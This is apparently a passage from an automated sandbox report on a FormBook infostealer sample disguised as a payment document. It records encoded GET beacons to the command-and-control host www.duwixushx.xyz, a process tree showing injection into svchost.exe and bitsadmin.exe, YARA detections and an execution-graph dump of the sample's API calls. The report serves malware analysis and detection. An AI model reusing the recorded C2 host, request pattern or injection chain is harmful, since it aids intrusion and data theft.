                                                                Data Raw: 36 64 72 3d 65 6f 73 56 4b 75 4c 42 65 6b 52 45 50 45 4f 53 39 68 47 52 42 45 73 42 49 38 34 66 69 5a 6d 38 47 48 70 53 38 58 53 46 4c 4b 64 48 37 66 48 4e 58 6e 71 4d 66 75 45 5a 4e 64 66 79 35 35 52 62 37 6e 79 78 63 6d 72 4b 4b 33 7a 4a 50 46 56 78 46 76 33 71 68 54 72 75 41 6a 59 67 4d 53 79 57 49 48 31 4a 42 79 57 37 47 63 69 70 51 56 51 39 6f 31 57 39 70 50 75 30 51 79 47 48 6f 71 6b 52 71 64 79 69 42 67 4c 77 37 38 35 41 6e 55 5a 64 2f 72 64 61 2b 7a 6d 35 70 69 46 32 70 42 6d 50 61 35 54 2b 48 54 6e 4d 75 4d 57 55 45 61 58 6c 52 37 74 68 62 79 73 4f 35 6b 66 53 55 2b 6f 2f 4c 41 59 57 43 46 58 64 73 74 68 63 6c 61 31 45 6f 38 46 4f 38 66 55 78 32 65 6e 49 59 65 62 61 4a 6a 74 36 49 57 39 72 4d 78 31 52 49 7a 42 42 2f 58 5a 6a 64 69 4a 5a 6e 59 5a 45 5a 6e 59 65 62 47 5a 31 4d 6b 55 2b 4b 42 43 6a 53 7a 64 53 52 79 4f 46 78 38 65 39 55 46 55 69 5a 50 48 56 4b 54 70 31 66 32 6b 4f 46 76 33 7a 7a 54 69 44 5a 69 43 65 49 62 4f 55 77 53 53 49 57 69 6d 30 59 51 34 7a 54 6a 32 52 79 57 35 2f 2f 6f [TRUNCATED]
                                                                Data Ascii: 6dr=eosVKuLBekREPEOS9hGRBEsBI84fiZm8GHpS8XSFLKdH7fHNXnqMfuEZNdfy55Rb7nyxcmrKK3zJPFVxFv3qhTruAjYgMSyWIH1JByW7GcipQVQ9o1W9pPu0QyGHoqkRqdyiBgLw785AnUZd/rda+zm5piF2pBmPa5T+HTnMuMWUEaXlR7thbysO5kfSU+o/LAYWCFXdsthcla1Eo8FO8fUx2enIYebaJjt6IW9rMx1RIzBB/XZjdiJZnYZEZnYebGZ1MkU+KBCjSzdSRyOFx8e9UFUiZPHVKTp1f2kOFv3zzTiDZiCeIbOUwSSIWim0YQ4zTj2RyW5//o6ll2SVD4gMizjcqt45LcMwrBula9VPujWxAbUwzhwThW9SAwPMJ7oZ+4n/Km87Y9t7woBHW1owSu2zc0tmUZqy+LXi0mrtfz8v3AmxH3pPUL0gT1dsMljY3fy1sjOFGKPge4CFDslfHWQy9BoLg5AAYIUEKtIbxZyB58y+8NvpNa++IaPGV8kaDH3LsWFnAS7fpaI5/t3O918wf9FjbhNlW6mdyGRgcaxKBhxRfGxN65/FK5ih0FzEBcJcriwIgSSJTGj4ED7yCf6cO7iQ69IOjv8kArvG150PFvw3FKiiBeoTJ8M7jskVOWS3ZY0YTOVvoxuKCkRkTRqMseQLdcOAupHWdEcoZo1r03nfveOqYpe6+fy92OFvdWqLVe4u5ROX3HBxFIwERwsUWP2XSvprrwIxvtEYGUgu5IeWrV0RKOjCgYQYWCRnz5l3htiMvgMoy+UcIFZBIJTGzWZvyhqNfWrFl8bqcfb76Jwce4jnFvJAhYxLcKEoN2q9ZuaqS1DX1CgzXxskRpd9qk0kW816hrfs3A8sTbA7Oin3xm5Kb3WiKyTZUH/lnPfGEyzIbuFT9K9Rr1P+WQxMFAvcxg/zu1kJIjSo9D9Brvfggdst+OnQvbNwVlvwSicwKnMrgGYrhNr7LJ5Y3XEvMVKO8gA+dNZl3ep57UAs [TRUNCATED]
                                                                Nov 27, 2024 08:57:12.400871038 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:57:12 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                44192.168.2.650035156.251.17.22480
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:57:14.465193033 CET499OUTGET /q0vk/?Kp=6N8LUn6pGPW&6dr=TqE1JZ2PW3JWY2ub7wbyGmkAFORXr7+yOAYp2neLNqkwqfDGdEjMQdAOFdDc8sxV6WeqUhb2JmW0DlQMLtnU5QjuOQNkNi2JEE5AET6tFv2ZXVhBmCTejYrGfFb1t6Bzh+26W2w= HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.duwixushx.xyz
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:57:16.023740053 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:57:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:02:53:04
                                                                Start date:27/11/2024
                                                                Path:C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
                                                                Imagebase:0x280000
                                                                File size:1'213'952 bytes
                                                                MD5 hash:07BD00D307952E993352E5311A7FDF90
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:02:53:05
                                                                Start date:27/11/2024
                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
                                                                Imagebase:0x920000
                                                                File size:46'504 bytes
                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2392608967.0000000007B40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2379572846.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2384044672.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:02:53:22
                                                                Start date:27/11/2024
                                                                Path:C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe"
                                                                Imagebase:0x910000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4597050581.0000000002740000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:5
                                                                Start time:02:53:24
                                                                Start date:27/11/2024
                                                                Path:C:\Windows\SysWOW64\bitsadmin.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\bitsadmin.exe"
                                                                Imagebase:0xc80000
                                                                File size:186'880 bytes
                                                                MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4596765676.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4592072566.0000000003010000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4596524893.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                General

                                                                Target ID:6
                                                                Start time:02:53:37
                                                                Start date:27/11/2024
                                                                Path:C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe"
                                                                Imagebase:0x910000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4599520546.0000000005600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:9
                                                                Start time:02:53:50
                                                                Start date:27/11/2024
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff728280000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:3.9%
                                                                  Dynamic/Decrypted Code Coverage:1.3%
                                                                  Signature Coverage:8%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:58
                                                                  execution_graph 92941 1228163 92944 1227dd8 92941->92944 92943 12281af 92957 1225808 92944->92957 92947 1227ea8 CreateFileW 92950 1227eb5 92947->92950 92954 1227e77 92947->92954 92948 1227ed1 VirtualAlloc 92949 1227ef2 ReadFile 92948->92949 92948->92950 92949->92950 92953 1227f10 VirtualAlloc 92949->92953 92951 12280d2 92950->92951 92952 12280c4 VirtualFree 92950->92952 92951->92943 92952->92951 92953->92950 92953->92954 92954->92948 92954->92950 92955 1227fd8 CloseHandle 92954->92955 92956 1227fe8 VirtualFree 92954->92956 92960 1228ce8 GetPEB 92954->92960 92955->92954 92956->92954 92962 1228c88 GetPEB 92957->92962 92959 1225e93 92959->92954 92961 1228d12 92960->92961 92961->92947 92963 1228cb2 92962->92963 92963->92959 92964 2f9bec 92968 290ae0 Mailbox ___crtGetEnvironmentStringsW 92964->92968 92966 29f4ea 48 API calls 92966->92968 92967 291526 Mailbox 93139 2ccc5c 86 API calls 4 library calls 92967->93139 92968->92966 92968->92967 92972 28ffe1 Mailbox 92968->92972 92995 28fec8 92968->92995 93001 2fa706 92968->93001 93003 2b97ed InterlockedDecrement 92968->93003 93007 28fe30 92968->93007 93036 2cb55b 92968->93036 93040 2e0d1d 92968->93040 93043 2e0d09 92968->93043 93046 2df0ac 92968->93046 93078 2ca6ef 92968->93078 93084 28ce19 92968->93084 93090 2de822 92968->93090 93132 2def61 82 API calls 2 library calls 92968->93132 92971 290509 93142 2ccc5c 86 API calls 4 library calls 92971->93142 92973 29146e 92982 286eed 48 API calls 92973->92982 92975 29f4ea 48 API calls 92975->92995 92978 2fa922 92979 291473 93141 2ccc5c 86 API calls 4 library calls 92979->93141 92981 2fa246 93133 286eed 92981->93133 92982->92972 92986 286eed 48 API calls 92986->92995 92987 2fa873 92988 28d7f7 48 API calls 92988->92995 92989 2fa30e 92989->92972 93137 2b97ed InterlockedDecrement 92989->93137 92990 2a0f0a 52 API calls __cinit 92990->92995 92992 2b97ed InterlockedDecrement 92992->92995 92994 2fa973 93143 2ccc5c 86 API calls 4 library calls 92994->93143 92995->92971 92995->92972 92995->92973 92995->92975 92995->92979 92995->92981 92995->92986 92995->92988 92995->92989 92995->92990 92995->92992 92995->92994 92999 2915b5 92995->92999 93130 291820 331 API calls 2 library calls 92995->93130 93131 291d10 59 API calls Mailbox 92995->93131 92997 2fa982 93140 2ccc5c 86 API calls 4 library calls 92999->93140 93138 2ccc5c 86 API calls 4 library calls 93001->93138 93003->92968 93008 28fe50 93007->93008 93034 28fe7e 93007->93034 93144 29f4ea 93008->93144 93010 29146e 93011 286eed 48 API calls 93010->93011 93033 28ffe1 93011->93033 93012 28d7f7 48 API calls 93012->93034 93013 290509 93158 2ccc5c 86 API calls 4 library calls 93013->93158 93017 29f4ea 48 API calls 93017->93034 93018 2fa922 93018->92968 93019 291473 93157 2ccc5c 86 API calls 4 library calls 93019->93157 93020 2fa246 93022 286eed 48 API calls 93020->93022 93022->93033 93024 286eed 48 API calls 93024->93034 93025 2b97ed InterlockedDecrement 93025->93034 93026 2fa873 93026->92968 93027 2fa30e 93027->93033 93155 2b97ed InterlockedDecrement 93027->93155 93028 2a0f0a 52 API calls __cinit 93028->93034 93030 2fa973 93159 2ccc5c 86 API calls 4 library calls 93030->93159 93032 2915b5 93156 2ccc5c 86 API calls 4 library calls 93032->93156 93033->92968 93034->93010 93034->93012 93034->93013 93034->93017 93034->93019 93034->93020 93034->93024 93034->93025 93034->93027 93034->93028 93034->93030 93034->93032 93034->93033 93153 291820 331 API calls 2 library calls 93034->93153 93154 291d10 59 API calls Mailbox 93034->93154 93035 2fa982 93037 2cb569 93036->93037 93038 2cb564 93036->93038 93037->92968 93182 2ca4d5 93038->93182 93204 2df8ae 93040->93204 93042 2e0d2d 93042->92968 93044 2df8ae 129 API calls 93043->93044 93045 2e0d19 93044->93045 93045->92968 93047 28d7f7 48 API calls 93046->93047 93048 2df0c0 93047->93048 93049 28d7f7 48 API calls 93048->93049 93050 2df0c8 93049->93050 93051 28d7f7 48 API calls 93050->93051 93052 2df0d0 93051->93052 93053 28936c 81 API calls 93052->93053 93077 2df0de 93053->93077 93054 286a63 48 API calls 93054->93077 93055 28c799 48 API calls 93055->93077 93056 2df2cc 93057 2df2f9 Mailbox 93056->93057 93399 286b68 48 API calls 93056->93399 93057->92968 93058 2df2b3 93380 28518c 93058->93380 93060 2df2ce 93062 28518c 48 API calls 93060->93062 93065 2df2dd 93062->93065 93063 286eed 48 API calls 93063->93077 93068 28510d 48 API calls 93065->93068 93066 28bdfa 48 API calls 93070 2df175 CharUpperBuffW 93066->93070 93068->93056 93069 28bdfa 48 API calls 93071 2df23a CharUpperBuffW 93069->93071 93369 28d645 93070->93369 93379 29d922 55 API calls 2 library calls 93071->93379 93074 28518c 48 API calls 93074->93077 93075 28936c 81 API calls 93075->93077 93076 28510d 48 API calls 93076->93077 93077->93054 93077->93055 93077->93056 93077->93057 93077->93058 93077->93060 93077->93063 93077->93066 93077->93069 93077->93074 93077->93075 93077->93076 93079 2ca6fb 93078->93079 93080 29f4ea 48 API calls 93079->93080 93082 2ca709 93080->93082 93081 2ca717 93081->92968 93082->93081 93083 28d7f7 48 API calls 93082->93083 93083->93081 93085 28ce28 __NMSG_WRITE 93084->93085 93086 29ee75 48 API calls 93085->93086 93087 28ce50 ___crtGetEnvironmentStringsW 93086->93087 93088 29f4ea 48 API calls 93087->93088 93089 28ce66 93088->93089 93089->92968 93091 2de84e 93090->93091 93092 2de868 93090->93092 93431 2ccc5c 86 API calls 4 library calls 93091->93431 93432 2dccdc 48 API calls 93092->93432 93095 2de871 93096 28fe30 330 API calls 93095->93096 93097 2de8cf 93096->93097 93098 2de96a 93097->93098 93100 2de916 93097->93100 93112 2de860 Mailbox 93097->93112 93099 2de978 93098->93099 93103 2de9c7 93098->93103 93451 2ca69d 48 API calls 93099->93451 93433 2c9b72 48 API calls 93100->93433 93102 2de949 93434 2945e0 93102->93434 93106 28936c 81 API calls 93103->93106 93103->93112 93108 2de9e1 93106->93108 93107 2de99b 93452 28bc74 48 API calls 93107->93452 93111 28bdfa 48 API calls 93108->93111 93110 2de9a3 Mailbox 93453 293200 93110->93453 93113 2dea05 CharUpperBuffW 93111->93113 93112->92968 93115 2dea1f 93113->93115 93116 2dea26 93115->93116 93117 2dea72 93115->93117 93525 2c9b72 48 API calls 93116->93525 93118 28936c 81 API calls 93117->93118 93119 2dea7a 93118->93119 93526 281caa 49 API calls 93119->93526 93122 2dea54 93123 2945e0 330 API calls 93122->93123 93123->93112 93124 2dea84 93124->93112 93125 28936c 81 API calls 93124->93125 93126 2dea9f 93125->93126 93527 28bc74 48 API calls 93126->93527 93128 2deaaf 93129 293200 330 API calls 93128->93129 93129->93112 93130->92995 93131->92995 93132->92968 93134 286ef8 93133->93134 93135 286f00 93133->93135 94615 28dd47 48 API calls ___crtGetEnvironmentStringsW 93134->94615 93135->92972 93137->92972 93138->92967 93139->92972 93140->92972 93141->92987 93142->92978 93143->92997 93147 29f4f2 __calloc_impl 93144->93147 93146 29f50c 93146->93034 93147->93146 93148 29f50e std::exception::exception 93147->93148 93160 2a395c 93147->93160 93174 2a6805 RaiseException 93148->93174 93150 29f538 93175 2a673b 47 API calls _free 93150->93175 93152 29f54a 93152->93034 93153->93034 93154->93034 93155->93033 93156->93033 93157->93026 93158->93018 93159->93035 93161 2a39d7 __calloc_impl 93160->93161 93167 2a3968 __calloc_impl 93160->93167 93181 2a7c0e 47 API calls __getptd_noexit 93161->93181 93164 2a399b RtlAllocateHeap 93164->93167 93173 2a39cf 93164->93173 93166 2a39c3 93179 2a7c0e 47 API calls __getptd_noexit 93166->93179 93167->93164 93167->93166 93170 2a39c1 93167->93170 93171 2a3973 93167->93171 93180 2a7c0e 47 API calls __getptd_noexit 93170->93180 93171->93167 93176 2a81c2 47 API calls __NMSG_WRITE 93171->93176 93177 2a821f 47 API calls 5 library calls 93171->93177 93178 2a1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93171->93178 93173->93147 93174->93150 93175->93152 93176->93171 93177->93171 93179->93170 93180->93173 93181->93173 93183 2ca4ec 93182->93183 93184 2ca5ee 93182->93184 93186 2ca5d4 Mailbox 93183->93186 93187 2ca58b 93183->93187 93188 2ca4fd 93183->93188 93184->93037 93185 29f4ea 48 API calls 93201 2ca54c Mailbox ___crtGetEnvironmentStringsW 93185->93201 93186->93185 93189 29f4ea 48 API calls 93187->93189 93190 29f4ea 48 API calls 93188->93190 93199 2ca51a 93188->93199 93189->93201 93190->93199 93191 2ca555 93195 29f4ea 48 API calls 93191->93195 93192 2ca545 93194 29f4ea 48 API calls 93192->93194 93193 29f4ea 48 API calls 93193->93184 93194->93201 93196 2ca55b 93195->93196 93202 2c9d2d 48 API calls 93196->93202 93198 2ca567 93203 29e65e 50 API calls 93198->93203 93199->93191 93199->93192 93199->93201 93201->93193 93202->93198 93203->93201 93240 28936c 93204->93240 93206 2df8ea 93231 2df92c Mailbox 93206->93231 93260 2e0567 93206->93260 93208 2dfb8b 93209 2dfcfa 93208->93209 93213 2dfb95 93208->93213 93323 2e0688 89 API calls Mailbox 93209->93323 93212 2dfd07 93212->93213 93215 2dfd13 93212->93215 93273 2df70a 93213->93273 93214 28936c 81 API calls 93235 2df984 Mailbox 93214->93235 93215->93231 93220 2dfbc9 93287 29ed18 93220->93287 93223 2dfbfd 93294 29c050 93223->93294 93224 2dfbe3 93293 2ccc5c 86 API calls 4 library calls 93224->93293 93227 2dfc14 93236 2dfc3e 93227->93236 93305 291b90 93227->93305 93228 2dfbee GetCurrentProcess TerminateProcess 93228->93223 93230 2dfd65 93230->93231 93237 2dfd7e FreeLibrary 93230->93237 93231->93042 93232 2dfc2d 93321 2e040f 105 API calls _free 93232->93321 93234 291b90 48 API calls 93234->93236 93235->93208 93235->93214 93235->93231 93291 2e29e8 48 API calls ___crtGetEnvironmentStringsW 93235->93291 93292 2dfda5 60 API calls 2 library calls 93235->93292 93236->93230 93236->93234 93322 28dcae 50 API calls Mailbox 93236->93322 93324 2e040f 105 API calls _free 93236->93324 93237->93231 93241 289384 93240->93241 93258 289380 93240->93258 93242 2f4cbd __i64tow 93241->93242 93243 2f4bbf 93241->93243 93244 289398 93241->93244 93250 2893b0 __itow Mailbox _wcscpy 93241->93250 93245 2f4bc8 93243->93245 93246 2f4ca5 93243->93246 93325 2a172b 80 API calls 4 library calls 93244->93325 93245->93250 93251 2f4be7 93245->93251 93326 2a172b 80 API calls 4 library calls 93246->93326 93249 29f4ea 48 API calls 93252 2893ba 93249->93252 93250->93249 93253 29f4ea 48 API calls 93251->93253 93254 28ce19 48 API calls 93252->93254 93252->93258 93256 2f4c04 93253->93256 93254->93258 93255 29f4ea 48 API calls 93257 2f4c2a 93255->93257 93256->93255 93257->93258 93259 28ce19 48 API calls 93257->93259 93258->93206 93259->93258 93327 28bdfa 93260->93327 93262 2e0582 CharLowerBuffW 93333 2c1f11 93262->93333 93269 2e05d2 93346 28b18b 93269->93346 93271 2e05de Mailbox 93272 2e061a Mailbox 93271->93272 93350 2dfda5 60 API calls 2 library calls 93271->93350 93272->93235 93274 2df77a 93273->93274 93275 2df725 93273->93275 93279 2e0828 93274->93279 93276 29f4ea 48 API calls 93275->93276 93278 2df747 93276->93278 93277 29f4ea 48 API calls 93277->93278 93278->93274 93278->93277 93280 2e0a53 Mailbox 93279->93280 93286 2e084b _strcat _wcscpy __NMSG_WRITE 93279->93286 93280->93220 93281 28cf93 58 API calls 93281->93286 93282 28d286 48 API calls 93282->93286 93283 28936c 81 API calls 93283->93286 93284 2a395c 47 API calls _W_store_winword 93284->93286 93286->93280 93286->93281 93286->93282 93286->93283 93286->93284 93364 2c8035 50 API calls __NMSG_WRITE 93286->93364 93288 29ed2d 93287->93288 93289 29edc5 VirtualProtect 93288->93289 93290 29ed93 93288->93290 93289->93290 93290->93223 93290->93224 93291->93235 93292->93235 93293->93228 93295 29c064 93294->93295 93297 29c069 Mailbox 93294->93297 93365 29c1af 48 API calls 93295->93365 93303 29c077 93297->93303 93366 29c15c 48 API calls 93297->93366 93299 29f4ea 48 API calls 93300 29c108 93299->93300 93302 29f4ea 48 API calls 93300->93302 93301 29c152 93301->93227 93304 29c113 93302->93304 93303->93299 93303->93301 93304->93227 93304->93304 93306 291cf6 93305->93306 93309 291ba2 93305->93309 93306->93232 93307 291bae 93314 291bb9 93307->93314 93368 29c15c 48 API calls 93307->93368 93309->93307 93310 29f4ea 48 API calls 93309->93310 93311 2f49c4 93310->93311 93312 29f4ea 48 API calls 93311->93312 93320 2f49cf 93312->93320 93313 291c5d 93313->93232 93314->93313 93315 29f4ea 48 API calls 93314->93315 93316 291c9f 93315->93316 93317 291cb2 93316->93317 93367 282925 48 API calls 93316->93367 93317->93232 93319 29f4ea 48 API calls 93319->93320 93320->93307 93320->93319 93321->93236 93322->93236 93323->93212 93324->93236 93325->93250 93326->93250 93328 28be0d 93327->93328 93332 28be0a ___crtGetEnvironmentStringsW 93327->93332 93329 29f4ea 48 API calls 93328->93329 93330 28be17 93329->93330 93351 29ee75 93330->93351 93332->93262 93334 2c1f3b __NMSG_WRITE 93333->93334 93335 2c1f79 93334->93335 93336 2c1f6f 93334->93336 93338 2c1ffa 93334->93338 93335->93271 93340 28d7f7 93335->93340 93336->93335 93362 29d37a 60 API calls 93336->93362 93338->93335 93363 29d37a 60 API calls 93338->93363 93341 29f4ea 48 API calls 93340->93341 93342 28d818 93341->93342 93343 29f4ea 48 API calls 93342->93343 93344 28d826 93343->93344 93345 2869e9 48 API calls ___crtGetEnvironmentStringsW 93344->93345 93345->93269 93347 28b199 93346->93347 93348 28b1a2 ___crtGetEnvironmentStringsW 93346->93348 93347->93348 93349 28bdfa 48 API calls 93347->93349 93348->93271 93349->93348 93350->93272 93354 29f4ea __calloc_impl 93351->93354 93352 2a395c _W_store_winword 47 API calls 93352->93354 93353 29f50c 93353->93332 93354->93352 93354->93353 93355 29f50e std::exception::exception 93354->93355 93360 2a6805 RaiseException 93355->93360 93357 29f538 93361 2a673b 47 API calls _free 93357->93361 93359 29f54a 93359->93332 93360->93357 93361->93359 93362->93336 93363->93338 93364->93286 93365->93297 93366->93303 93367->93317 93368->93314 93370 28d654 93369->93370 93378 28d67e 93369->93378 93371 28d65b 93370->93371 93372 28d6c2 93370->93372 93373 28d6ab 93371->93373 93375 28d666 93371->93375 93372->93373 93402 29dce0 53 API calls 93372->93402 93373->93378 93401 29dce0 53 API calls 93373->93401 93400 28d9a0 53 API calls __cinit 93375->93400 93378->93077 93379->93077 93381 285197 93380->93381 93382 2f1ace 93381->93382 93383 28519f 93381->93383 93413 286b4a 93382->93413 93403 285130 93383->93403 93386 2f1adb __NMSG_WRITE 93388 29ee75 48 API calls 93386->93388 93387 2851aa 93390 28510d 93387->93390 93389 2f1b07 ___crtGetEnvironmentStringsW 93388->93389 93391 28511f 93390->93391 93392 2f1be7 93390->93392 93421 28b384 93391->93421 93430 2ba58f 48 API calls ___crtGetEnvironmentStringsW 93392->93430 93395 28512b 93395->93056 93396 2f1bf1 93397 286eed 48 API calls 93396->93397 93398 2f1bf9 Mailbox 93397->93398 93399->93057 93400->93378 93401->93378 93402->93373 93404 28513f __NMSG_WRITE 93403->93404 93405 2f1b27 93404->93405 93406 285151 93404->93406 93408 286b4a 48 API calls 93405->93408 93416 28bb85 93406->93416 93410 2f1b34 93408->93410 93409 28515e ___crtGetEnvironmentStringsW 93409->93387 93411 29ee75 48 API calls 93410->93411 93412 2f1b57 ___crtGetEnvironmentStringsW 93411->93412 93414 29f4ea 48 API calls 93413->93414 93415 286b54 93414->93415 93415->93386 93417 28bb9b 93416->93417 93420 28bb96 ___crtGetEnvironmentStringsW 93416->93420 93418 29ee75 48 API calls 93417->93418 93419 2f1b77 93417->93419 93418->93420 93420->93409 93422 28b392 93421->93422 93429 28b3c5 ___crtGetEnvironmentStringsW 93421->93429 93423 28b3b8 93422->93423 93424 28b3fd 93422->93424 93422->93429 93425 28bb85 48 API calls 93423->93425 93426 29f4ea 48 API calls 93424->93426 93425->93429 93427 28b407 93426->93427 93428 29f4ea 48 API calls 93427->93428 93428->93429 93429->93395 93430->93396 93431->93112 93432->93095 93433->93102 93435 29479f 93434->93435 93436 294637 93434->93436 93439 28ce19 48 API calls 93435->93439 93437 2f6e05 93436->93437 93438 294643 93436->93438 93440 2de822 331 API calls 93437->93440 93587 294300 331 API calls ___crtGetEnvironmentStringsW 93438->93587 93446 2946e4 Mailbox 93439->93446 93442 2f6e11 93440->93442 93443 294739 Mailbox 93442->93443 93588 2ccc5c 86 API calls 4 library calls 93442->93588 93443->93112 93445 294659 93445->93442 93445->93443 93445->93446 93528 2cfa0c 93446->93528 93569 284252 93446->93569 93575 2d6ff0 93446->93575 93584 2c6524 93446->93584 93451->93107 93452->93110 94398 28bd30 93453->94398 93455 293267 93456 2932f8 93455->93456 93457 2f907a 93455->93457 93521 293628 93455->93521 94471 29c36b 86 API calls 93456->94471 94477 2ccc5c 86 API calls 4 library calls 93457->94477 93461 2f94df 93461->93521 94498 2ccc5c 86 API calls 4 library calls 93461->94498 93463 293313 93463->93461 93500 2934eb Mailbox ___crtGetEnvironmentStringsW 93463->93500 93463->93521 94403 282b7a 93463->94403 93467 2f926d 